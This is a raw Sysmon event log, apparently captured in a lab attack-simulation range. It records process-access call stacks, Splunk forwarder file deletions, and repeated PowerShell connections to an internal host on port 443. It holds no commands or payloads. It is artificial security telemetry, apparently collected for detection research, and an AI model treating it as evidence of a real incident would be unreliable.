13:13:08.645{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496627Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:13:08.645{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496626Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.645{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496625Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:13:08.645{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-9FE4-6140-6156-04000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496624Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.645{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9FE4-6140-6156-04000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496623Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.630{B81B27B7-9FE4-6140-6156-04000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK 
driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036496622Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.093{B81B27B7-9FE3-6140-6056-04000000C801}45166880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036496636Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.312{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50434-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496635Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:09.775{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EAD5093B06F25099E6DD270D577157E,SHA256=47F22865D872BBB117253E542EF56BA2BE78E5C1B6E43174FCF884BD71755A63,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496637Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:10.790{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E830C4A2E783812F2CE6A380799218B7,SHA256=90FF43B95A400DE366CE17BE0F28AE61BA1CE3B21E16648D8E15389F291287D9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496638Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:11.806{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C33D302C062D13F41560E5672E1A1BAE,SHA256=1010261F9C9FC0D081627D49AEDD758853BFFAD4EEB2A5E99D5198A8FDC307BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496639Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:12.857{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDD05F71CC6D15C14DAC340BEB0C3E4A,SHA256=8DD12FE4E0133748961ED82667A5DEF4E8BC7EB8616A34EE93867B68C9ED6C65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036496643Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:44.322{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50436-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036496642Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:43.769{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50435-false10.0.1.12-8000- 23542300x800000000000000036496641Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:13.908{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97F58F1CD752F11B19C1120738E4FBAD,SHA256=ED11D25E4EA8AAA856B76F25EE33B702D358A6D07693A49057A51DFE16008CB4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496640Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:13.671{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AB32E922B4675AB06D3141CC8BAE2B84,SHA256=6E62C56EF7B90DB8FEB41DE727EB3B0493F9AFCCCC8560A1E37A017AFC3B573F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496644Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:14.916{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67B7CF8D169F6277F6F4B5ED732AB0E4,SHA256=30058998552AF88A51D9E45FC87F280F4945DEBFF4C58BD390F8C7DE4CAAFF4F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496645Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:15.965{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBAB63988C5C6BDEE2C1A7608100C580,SHA256=229528927BFEBF513F7504C939D1A2C63D5540B260493A517B407D67180D3B51,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496646Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:16.980{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A75B6184307DC06D6DB41EE827CAE2C0,SHA256=5AB911B74080B32C40D40AE7E948016BBBB5908D3EAFC110F3F0347EA0F8C916,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496647Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:17.994{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3811C6D2EA1490D3E88799EE087EE004,SHA256=403271D0257D65640FE8A93B32D94A4106668FF95B1374D76148E9A6F548A1D3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496648Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:48.775{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50437-false10.0.1.12-8000- 354300x800000000000000036496651Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:50.328{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50438-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496650Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:19.661{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=106CD0F068908BB7F9C1A669AB7C07C0,SHA256=AC0B633F871E891B22991BAA10C86C73965604FBCCB864A9BFCEB5B251305D99,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496649Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:19.008{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC6F6E84DFE66398BE30C3983FB2EE6C,SHA256=A339A1EA55AA69A0F567519A91D7EDFF1B525D2228639DBA529E908C06EEB6EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496652Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:20.026{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A271D14C7C661A708DAE7D9DBF172F55,SHA256=6A8C1DA2E700406A433B67EB112355B4234C4E95432BC259EF5B363BDDA3C517,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496653Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:21.076{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=513EF1F2A53D306BB013A41120E4A90F,SHA256=B80F8FE9AC7DC1AFD9CD9EACA4F679BF863CDB48F234E0215B3C8225273620F4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496654Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:22.091{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84E9B4A73C4EBAA4B5091FBF0D95D43B,SHA256=D919568B4D8CCF5613430CE67F6D8A7320C2231EA19C8FCD09AD87AAFC0B220F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036496656Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:23.222{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=B0799AE287647D622CF8537A6C012883,SHA256=59BF73ED52277FC024FA683BE109A3968ECA5A7659E5A29D4A37921243168023,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496655Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:23.106{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0A15FCC4574E5385DF833D0D611CAAC,SHA256=8151B536AA81DBFD2FC289F6279A13E6C0992AA17D95C6CD589A04186090DFA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.704{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9FF4-6140-6356-04000000C801}4608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:13:24.704{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496674Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.704{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496673Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:13:24.704{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496672Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.704{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496671Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:13:38.046{B81B27B7-A001-6140-6456-04000000C801}60006524C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.459{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79E51AC98B760D90AA1F25583876E682,SHA256=371FC5AECDCD822158BE8BC8054CBDE54BCB5550F0C214DE1DD3BF115901B31F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:09.390{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50446-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036496730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.274{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A003-6140-6656-04000000C801}6680C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.274{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
